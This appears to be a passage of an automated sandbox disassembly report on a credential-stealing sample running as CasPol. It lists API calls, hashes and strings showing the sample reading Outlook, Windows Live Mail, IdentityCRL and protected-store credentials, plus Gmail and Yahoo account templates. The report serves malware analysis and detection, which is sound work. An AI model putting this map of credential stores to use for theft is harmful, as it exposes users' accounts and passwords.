                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Library$AddressFreeLoadProc_mbscpy
                                                                                                                                                                                                                    • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                                                                                                                                                                    • API String ID: 1197458902-317895162
                                                                                                                                                                                                                    • Opcode ID: 7553cdf7f2ce1cf444f62a1d2691c4a3b1dbf44d811f574412da19563fe3f526
                                                                                                                                                                                                                    • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7553cdf7f2ce1cf444f62a1d2691c4a3b1dbf44d811f574412da19563fe3f526
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 261 444c4a-444c66 call 444e38 GetModuleHandleA 264 444c87-444c8a 261->264 265 444c68-444c73 261->265 267 444cb3-444d00 __set_app_type __p__fmode __p__commode call 444e34 264->267 265->264 266 444c75-444c7e 265->266 269 444c80-444c85 266->269 270 444c9f-444ca3 266->270 275 444d02-444d0d __setusermatherr 267->275 276 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 267->276 269->264 273 444c8c-444c93 269->273 270->264 271 444ca5-444ca7 270->271 274 444cad-444cb0 271->274 273->264 277 444c95-444c9d 273->277 274->267 275->276 280 444da4-444da7 276->280 281 444d6a-444d72 276->281 277->274 282 444d81-444d85 280->282 283 444da9-444dad 280->283 284 444d74-444d76 281->284 285 444d78-444d7b 281->285 287 444d87-444d89 282->287 288 444d8b-444d9c GetStartupInfoA 282->288 283->280 284->281 284->285 285->282 286 444d7d-444d7e 285->286 286->282 287->286 287->288 289 444d9e-444da2 288->289 290 444daf-444db1 288->290 291 444db2-444dc6 GetModuleHandleA call 40cf44 289->291 290->291 294 444dcf-444e0f _cexit call 444e71 291->294 295 444dc8-444dc9 exit 291->295 295->294
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                                                                                                                                                    • String ID: 2t
                                                                                                                                                                                                                    • API String ID: 3662548030-3527913779
                                                                                                                                                                                                                    • Opcode ID: a2c5e685021b953e45b16df810cc3e629d637f1bb2461c548f2803c140be0595
                                                                                                                                                                                                                    • Instruction ID: dd0826a03bb44e9375613df7343647c7563f031d366e42a412bc6d4d3743f318
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a2c5e685021b953e45b16df810cc3e629d637f1bb2461c548f2803c140be0595
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AF41A0B0C02344DFEB619FA4D8847AD7BB8FB49325F28413BE451A7291D7388982CB5D

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 299 40fb00-40fb35 call 44b090 RegOpenKeyExA 302 40fc37-40fc3d 299->302 303 40fb3b-40fb4f RegOpenKeyExA 299->303 304 40fb55-40fb7e RegQueryValueExA 303->304 305 40fc2d-40fc31 RegCloseKey 303->305 306 40fc23-40fc27 RegCloseKey 304->306 307 40fb84-40fb93 call 404734 304->307 305->302 306->305 307->306 310 40fb99-40fbd1 call 4047a5 307->310 310->306 313 40fbd3-40fbdb 310->313 314 40fc19-40fc1d LocalFree 313->314 315 40fbdd-40fc14 memcpy * 2 call 40f802 313->315 314->306 315->314
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
                                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                                                                                                                                                                                                                      • Part of subcall function 00404734: LoadLibraryA.KERNEL32(?), ref: 0040473C
                                                                                                                                                                                                                      • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?,?,00000000), ref: 00404754
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00456E58,00000040,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FBE4
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?), ref: 0040FBF9
                                                                                                                                                                                                                      • Part of subcall function 0040F802: RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,00456E58,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                                                                                                                                                                                                      • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                                                                                                                                                                                                                      • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                                                                                                                                                      • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                                                                                                                                                                                    • String ID: Dynamic Salt$Software\Microsoft\IdentityCRL$Value$XnE
                                                                                                                                                                                                                    • API String ID: 2768085393-2409096184
                                                                                                                                                                                                                    • Opcode ID: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                                                                                                                                                                                                                    • Instruction ID: dc42a4d3869b5799c80e2b369f36587618a74ee4c7744a3ab9dbe2425e101413
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BA316F72508348AFE750DF51DC81E5BBBECFB88358F04093EBA94E2151D735D9188B6A

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 317 402c5d-402c81 call 410a9c 320 402da5-402db0 317->320 321 402c87-402cb7 memset call 410b62 317->321 324 402d9c-402d9f RegCloseKey 321->324 325 402cbd-402cbf 321->325 324->320 326 402cc4-402d2d call 410b1e memset sprintf call 410a9c 325->326 331 402d3a-402d6b sprintf call 410a9c 326->331 332 402d2f-402d35 call 402bd1 326->332 336 402d7a-402d8a call 410b62 331->336 337 402d6d-402d75 call 402bd1 331->337 332->331 340 402d8f-402d94 336->340 337->336 340->326 341 402d9a-402d9b 340->341 341->324
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00402C9D
                                                                                                                                                                                                                      • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00402D9F
                                                                                                                                                                                                                      • Part of subcall function 00410B1E: RegCloseKey.KERNEL32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00402CF7
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 00402D10
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 00402D4E
                                                                                                                                                                                                                      • Part of subcall function 00402BD1: memset.MSVCRT ref: 00402BF1
                                                                                                                                                                                                                      • Part of subcall function 00402BD1: RegCloseKey.ADVAPI32 ref: 00402C55
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Closememset$sprintf$EnumOpen
                                                                                                                                                                                                                    • String ID: %s\%s$Identities$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Username
                                                                                                                                                                                                                    • API String ID: 1831126014-3814494228
                                                                                                                                                                                                                    • Opcode ID: b1494c850d96e19dfebe9b6e5b972ea39351de22b51df2d3807edb00f3b2aba3
                                                                                                                                                                                                                    • Instruction ID: 079f63aacd2b880b2e0576cff081af09170d207e8fe08998d1b5f7116231a607
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b1494c850d96e19dfebe9b6e5b972ea39351de22b51df2d3807edb00f3b2aba3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C7313072D0011DBADB11DA91CD46FEFB77CAF14345F0404A6BA18B2191E7B8AF849B64

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0044430B
                                                                                                                                                                                                                      • Part of subcall function 00410DBB: SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000104), ref: 00410DF2
                                                                                                                                                                                                                      • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                                                                                                                                                                                      • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                                                                                                                                                                                      • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                                                                                                                                                                                      • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                                                                                                                                                                                      • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                                                                                                                                                      • Part of subcall function 00410DBB: _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00444379
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00444394
                                                                                                                                                                                                                      • Part of subcall function 00410B1E: RegCloseKey.KERNEL32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                                                                    • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 004443DB
                                                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 00444401
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • Store Root, xrefs: 004443A5
                                                                                                                                                                                                                    • \Microsoft\Windows Mail, xrefs: 00444329
                                                                                                                                                                                                                    • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                                                                                                                                                                                    • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$strlen$Close$EnvironmentExpandFolderPathSpecialStrings_mbscat_mbscpy_strcmpi
                                                                                                                                                                                                                    • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                                                                                                                                                                    • API String ID: 1502082548-2578778931
                                                                                                                                                                                                                    • Opcode ID: 88eecb5596c8840dacdab9e6d9cddf85e53b3344e0b54babe6c18053d28390f2
                                                                                                                                                                                                                    • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 88eecb5596c8840dacdab9e6d9cddf85e53b3344e0b54babe6c18053d28390f2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 363 40f460-40f5bd memset * 2 call 4078ba * 2 RegOpenKeyExA 368 40f5c3-40f5ea RegQueryValueExA 363->368 369 40f6d9-40f6df 363->369 370 40f6d0-40f6d3 RegCloseKey 368->370 371 40f5f0-40f5f4 368->371 370->369 371->370 372 40f5fa-40f604 371->372 373 40f606-40f618 call 40466b call 404734 372->373 374 40f677 372->374 384 40f66a-40f675 call 404785 373->384 385 40f61a-40f63e call 4047a5 373->385 376 40f67a-40f67d 374->376 376->370 377 40f67f-40f6bf call 4012ee RegQueryValueExA 376->377 377->370 383 40f6c1-40f6cf 377->383 383->370 384->376 385->384 390 40f640-40f643 385->390 391 40f661-40f664 LocalFree 390->391 392 40f645-40f65a memcpy 390->392 391->384 392->391
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040F567
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040F57F
                                                                                                                                                                                                                      • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                                                                                                                                                                                      • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                                                                                                                                                      • Part of subcall function 00404734: LoadLibraryA.KERNEL32(?), ref: 0040473C
                                                                                                                                                                                                                      • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?,?,00000000), ref: 00404754
                                                                                                                                                                                                                    • memcpy.MSVCRT(00000020,?,?,?,00000000,?,?,?,?,?,00000000), ref: 0040F652
                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2012582556-3916222277
                                                                                                                                                                                                                    • Opcode ID: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                                                                                                                                                                                    • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 393 4037ca-40381c memset * 2 call 444551 396 4038e2-4038e5 393->396 397 403822-403882 call 4021b6 call 406f06 * 2 strchr 393->397 404 403884-403895 _mbscpy 397->404 405 403897-4038a2 strlen 397->405 406 4038bf-4038dd _mbscpy call 4023e5 404->406 405->406 407 4038a4-4038bc sprintf 405->407 406->396 407->406
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004037EB
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004037FF
                                                                                                                                                                                                                      • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                                                                                                                                                                                                      • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                                                                                                                                                                      • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                                                      • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                                                                                                    • strchr.MSVCRT ref: 0040386E
                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?), ref: 0040388B
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 00403897
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 004038B7
                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?), ref: 004038CD
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                                                                                                                                                                                                    • String ID: %s@yahoo.com
                                                                                                                                                                                                                    • API String ID: 317221925-3288273942
                                                                                                                                                                                                                    • Opcode ID: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                                                                                                                                                                                                    • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 409 4036e5-4036f5 410 4037c6-4037c7 409->410 411 4036fb-403709 call 410863 409->411 413 40370e-403710 411->413 414 4037c5 413->414 415 403716-40372a strchr 413->415 414->410 415->414 416 403730-403787 call 4021b6 _mbscpy * 2 strlen 415->416 419 4037a4-4037c0 _mbscpy call 4023e5 416->419 420 403789-4037a1 sprintf 416->420 419->414 420->419
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00410863: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                                                                                                                                                                      • Part of subcall function 00410863: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                                                                                                                                                                      • Part of subcall function 00410863: memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                                                                                                                                                                                                      • Part of subcall function 00410863: CoTaskMemFree.OLE32(?), ref: 004108D2
                                                                                                                                                                                                                    • strchr.MSVCRT ref: 0040371F
                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,00000001,?,?,?), ref: 00403748
                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,?,00000001,?,?,?), ref: 00403758
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 00403778
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040379C
                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?), ref: 004037B2
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _mbscpy$FromStringUuid$FreeTaskmemcpysprintfstrchrstrlen
                                                                                                                                                                                                                    • String ID: %s@gmail.com
                                                                                                                                                                                                                    • API String ID: 3261640601-4097000612
                                                                                                                                                                                                                    • Opcode ID: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                                                                                                                                                                                                                    • Instruction ID: 26c7b24e36a56a715c82424c63065c573d607dcbd7bcbeb2789f412f71db7656
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F21AEF290415C5AEB11DB95DCC5FDAB7FCEB54308F0405ABF108E3181EA78AB888B65

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 422 4034e4-403544 memset * 2 call 410b1e 425 403580-403582 422->425 426 403546-40357f _mbscpy call 406d55 _mbscat call 4033f0 422->426 426->425
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403504
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040351A
                                                                                                                                                                                                                      • Part of subcall function 00410B1E: RegCloseKey.KERNEL32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                                                                    • _mbscpy.MSVCRT(00000000,00000000), ref: 00403555
                                                                                                                                                                                                                      • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                                                                                                                                      • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                                                                                                                                    • _mbscat.MSVCRT ref: 0040356D
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _mbscatmemset$Close_mbscpystrlen
                                                                                                                                                                                                                    • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                                                                                                                                                                    • API String ID: 3071782539-966475738
                                                                                                                                                                                                                    • Opcode ID: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                                                                                                                                                                                                                    • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 431 408db6-408dbd 432 408dc4-408dd0 431->432 433 408dbf call 408d34 431->433 435 408de2 432->435 436 408dd2-408ddb 432->436 433->432 439 408de4-408de6 435->439 437 408e0d-408e1c 436->437 438 408ddd-408de0 436->438 437->439 438->435 438->436 440 408f07 439->440 441 408dec-408df2 439->441 442 408f09-408f0b 440->442 443 408df4-408e04 441->443 444 408e1e-408e25 441->444 447 408e05-408e0b 443->447 445 408e27-408e47 _mbscpy call 409240 444->445 446 408e6b-408e7e call 408f0c 444->446 454 408e49-408e59 strlen 445->454 455 408e5b-408e69 445->455 448 408e7f-408e87 LoadStringA 446->448 447->448 453 408e89 448->453 456 408f00-408f05 453->456 457 408e8b-408e9a 453->457 454->453 454->455 455->447 456->442 457->456 458 408e9c-408ea8 457->458 458->456 459 408eaa-408efe memcpy 458->459 459->440 459->456
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                                                                                                                                                                      • Part of subcall function 00409240: _itoa.MSVCRT ref: 00409261
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 00408E4F
                                                                                                                                                                                                                    • LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                                                                                                                                                    • memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                                                                                                                                                                      • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT ref: 00408D5C
                                                                                                                                                                                                                      • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT ref: 00408D7A
                                                                                                                                                                                                                      • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT ref: 00408D98
                                                                                                                                                                                                                      • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT ref: 00408DA8
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • strings, xrefs: 00408E27
                                                                                                                                                                                                                    • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00408DCA
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??2@$LoadString_itoa_mbscpymemcpystrlen
                                                                                                                                                                                                                    • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$strings
                                                                                                                                                                                                                    • API String ID: 4036804644-4125592482
                                                                                                                                                                                                                    • Opcode ID: 93499d40d0ac09f03a262576db3bd02ec7d22a5ce3c652b96661fe7e7ae87012
                                                                                                                                                                                                                    • Instruction ID: 8088189cea062d7f30cfe1d816b9e84d6c9af13e32ba145f50863190e1f773ff
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 93499d40d0ac09f03a262576db3bd02ec7d22a5ce3c652b96661fe7e7ae87012
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B3170B1101722AFD715DB15ED41E733766E7803067124A3FE981972A3CB39E8A1CB9E

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 460 410863-41088b UuidFromStringA * 2 461 4108dd 460->461 462 41088d-41088f 460->462 463 4108df-4108e2 461->463 462->461 464 410891-4108aa call 410827 462->464 466 4108af-4108b1 464->466 466->461 467 4108b3-4108b9 466->467 468 4108bb-4108bd 467->468 469 4108be-4108db memcpy CoTaskMemFree 467->469 468->469 469->463
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                                                                                                                                                                    • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
